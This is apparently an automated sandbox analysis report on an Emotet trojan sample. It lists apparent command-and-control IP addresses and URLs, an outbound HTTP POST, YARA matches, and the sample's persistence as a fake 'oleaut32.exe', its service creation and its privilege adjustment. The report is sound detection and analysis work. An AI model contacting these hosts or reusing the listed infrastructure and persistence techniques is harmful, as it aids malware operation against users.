              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownHTTP traffic detected: POST /aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 71.72.196.159/aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------wa4T8cPZY0e2iD10iYmCsXHost: 71.72.196.159Content-Length: 4692Cache-Control: no-cache
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/)
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A//h
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/7
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/L
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://134.209.36.254:8080/Jg04eNfDVrhItWur/
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/E
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap//
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/ET
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002970000.00000004.00000020.00020000.00000000.sdmp, oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/vBtfrqns/
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/vBtfrqns/&
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/vBtfrqns/b
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, oleaut32.exe, 00000001.00000002.2928785476.0000000002970000.00000004.00000020.00020000.00000000.sdmp, oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.216.33/FJlVHXJ3dGgmVB/
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.216.33/FJlVHXJ3dGgmVB/8
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53279e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53279e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.620000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53052e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f052e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f052e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53052e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.5e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E25A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,1_2_005E25A0

              System Summary

              barindex
              Source: 1.2.oleaut32.exe.4f279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (317).exe.53279e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (317).exe.53279e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (317).exe.620000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 1.2.oleaut32.exe.4f279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (317).exe.53052e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 1.2.oleaut32.exe.4f052e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 1.2.oleaut32.exe.4f052e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (317).exe.53052e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 1.2.oleaut32.exe.5e0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: C:\Users\user\Desktop\ExeFile (317).exeFile created: C:\Windows\SysWOW64\KBDOLDIT\Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeFile deleted: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe:Zone.IdentifierJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_006280D00_2_006280D0
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00627D600_2_00627D60
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00621C700_2_00621C70
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_006275300_2_00627530
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_006263F00_2_006263F0
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00539C6E0_2_00539C6E
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053380E0_2_0053380E
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005390CE0_2_005390CE
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005398FE0_2_005398FE
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E80D01_2_005E80D0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E1C701_2_005E1C70
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E7D601_2_005E7D60
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E75301_2_005E7530
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E63F01_2_005E63F0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F9C6E1_2_004F9C6E
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F380E1_2_004F380E
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F90CE1_2_004F90CE
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F98FE1_2_004F98FE
              Source: ExeFile (317).exeStatic PE information: Resource name: DAGHHHHHTY type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Source: ExeFile (317).exe, 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (317).exe
              Source: ExeFile (317).exeBinary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (317).exe
              Source: ExeFile (317).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1.2.oleaut32.exe.4f279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (317).exe.53279e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (317).exe.53279e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (317).exe.620000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 1.2.oleaut32.exe.4f279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (317).exe.53052e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 1.2.oleaut32.exe.4f052e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 1.2.oleaut32.exe.4f052e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (317).exe.53052e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 1.2.oleaut32.exe.5e0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@0/97
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0040E170 GetLastError,FormatMessageW,_wprintf,0_2_0040E170
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0040E220 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040E220
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_0040E220 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040E220
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: CreateServiceW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,0_2_00628660
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0040F510 GetUserNameW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,wsprintfW,_memset,OpenProcess,CloseHandle,wsprintfW,wsprintfW,Process32NextW,CloseHandle,0_2_0040F510
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00624F50 ChangeServiceConfig2W,GetProcessHeap,HeapFree,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetTickCount,GetProcessHeap,HeapFree,RtlFreeHeap,0_2_00624F50
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: Run0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: Edit0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: Cancel0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (317).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: win32app1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: Run1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: win32app1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: BUTTON1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: BUTTON1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: BUTTON1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: win32app1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: Edit1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: BUTTON1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: Cancel1_2_0040FA80
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCommand line argument: BUTTON1_2_0040FA80
              Source: ExeFile (317).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\ExeFile (317).exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ExeFile (317).exeReversingLabs: Detection: 92%
              Source: unknownProcess created: C:\Users\user\Desktop\ExeFile (317).exe "C:\Users\user\Desktop\ExeFile (317).exe"
              Source: C:\Users\user\Desktop\ExeFile (317).exeProcess created: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe "C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe"
              Source: C:\Users\user\Desktop\ExeFile (317).exeProcess created: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe "C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: windows.staterepositoryps.dllJump to behavior
